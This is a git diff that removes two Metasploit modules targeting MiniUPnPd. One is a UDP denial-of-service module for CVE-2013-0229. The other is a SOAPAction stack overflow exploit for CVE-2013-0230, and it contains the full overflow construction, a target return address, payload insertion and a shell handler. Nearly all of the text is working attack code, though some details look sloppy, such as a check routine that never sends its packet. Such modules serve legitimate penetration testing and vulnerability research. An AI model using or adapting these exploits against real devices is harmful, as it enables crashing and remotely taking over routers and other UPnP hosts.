diff --git a/modules/exploits/multi/upnp/miniupnpd_dos.rb b/modules/exploits/multi/upnp/miniupnpd_dos.rb
deleted file mode 100644
index 5d3fc903e2..0000000000
--- a/modules/exploits/multi/upnp/miniupnpd_dos.rb
+++ /dev/null
@@ -1,86 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Remote::Udp
- include Msf::Auxiliary::Dos
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'MiniUPnPd < 1,4 denial of service (DoS) exploit',
- 'Description' =>
- %q{
- This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
- server via specifically crafted UDP request. This vulnerability was identified
- as CVE-2013-0229.
- },
- 'Author' => [ 'Dejan Lukan' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 9999 $',
- 'References' => [
- [ 'CVE', '2013-0229' ],
- [ 'OSVDB', '89625' ],
- ],
- 'DisclosureData' => 'Mar 27 2013',
- ))
-
- register_options(
- [
- Opt::RPORT(1900),
- ], self.class)
- end
-
- def run
- # connect to the UDP port
- connect_udp
- # the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
- # ST line
- sploit = "M-SEARCH * HTTP/1.1\r\n"\ "HOST: 239.255.255.250:1900\r\n"\ "ST:uuid:schemas:device:MX:3"
- # the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
- # this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
- # characters: there's more chance that the the program will run off the stack.
- sploit += ' '*(1500-sploit.length)
- # send the exploit to the target
- print_status("Sending malformed packet to #{rhost}...")
- udp_sock.put(sploit)
- # disconnect from the server
- print_status("The target should be unresponsive now...")
- disconnect_udp
- end
-end
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb b/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
deleted file mode 100644
index 329317f3f6..0000000000
--- a/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
+++ /dev/null
@@ -1,156 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'MiniUPnPd 1.0 stack overflow remote code execution',
- 'Description' =>
- %q{
- This module exploits the MiniUPnP 1.0 SOAP stack overflow vulnerability present
- in the SOAPAction HTTP header. This vulnerability was identified as CVE-2013-0230.
- },
- 'Author' => [ 'Dejan Lukan' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 9999 $',
- 'DefaultOptions' => { 'EXITFUNC' => 'process', },
- # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
- # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
- # of the program is never reached)
- 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
- 'Platform' => 'linux',
- 'References' => [
- [ 'CVE', '2013-0230' ],
- [ 'OSVDB', '89624' ],
- ],
- 'Targets' =>
- [
- #['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }],
- ['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
- ],
- 'DefaultTarget' => 0,
- 'Privileged' => false,
- 'DisclosureData' => 'Mar 27 2013',
- ))
-
- register_options(
- [
- Opt::RPORT(5555),
- ], self.class)
- end
-
-
- def check
- packet = "M-SEARCH * HTTP/1.1\r\n \ HOST: 239.255.255.250:1900\r\n \ ST: ssdp:all\r\n \ MX:2\r\n \ MAN:\"ssdp:discover\"\r\n"
- end
-
-
- def exploit
- #
- # Build the SOAP Exploit
- #
- # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
- sploit = "\xeb\x2d"
-
- # a valid action
- sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
-
- # payload
- sploit += payload.encoded
-
- # nops
- #sploit += "\x90"*(target['Offset'] - sploit.length - 16)
- sploit += rand_text(target['Offset'] - sploit.length - 16)
-
- # overwrite registers on stack
- sploit += "\x41\x41\x41\x41" # overwrite EBX
- sploit += "\x42\x42\x42\x42" # overwrite ESI
- sploit += "\x43\x43\x43\x43" # overwrite EDI
- sploit += "\x44\x44\x44\x44" # overwrite EBP
-
- # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
- # stack points directly to the string after 'Soapaction: ', which is why we must
- # throw the first value on the stack away, which we're doing with the pop ebp
- # instruction. Then we're returning to the next value on the stack, which is
- # exactly the address that we want.
- sploit += [target.ret].pack('V')
-
- # the ending " character is necessary for the vulnerability to be reached
- sploit += "\""
-
- # data sent in the POST body
- data =
- "\r\n" +
- "\r\n" +
- "\r\n" +
- "\r\n" +
- "\r\n" +
- "\r\n" +
- "\r\n"
-
-
- #
- # Build and send the HTTP request
- #
- print_status("Sending exploit to victim #{target.name} at ...")
- send_request_raw({
- 'uri' => target_uri.path,
- 'method' => 'POST',
- 'headers' => {
- 'SOAPAction' => sploit,
- #'User-Agent' => 'Python-urllib/2.7',
- #'Connection' => 'close',
- #'Content-Type' => 'application/x-www-form-urlencoded',
- },
- 'data' => data,
- }, 25)
-
-
- # handle the exploit
- handler
-
- # disconnect from the server
- disconnect
- end
-end
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-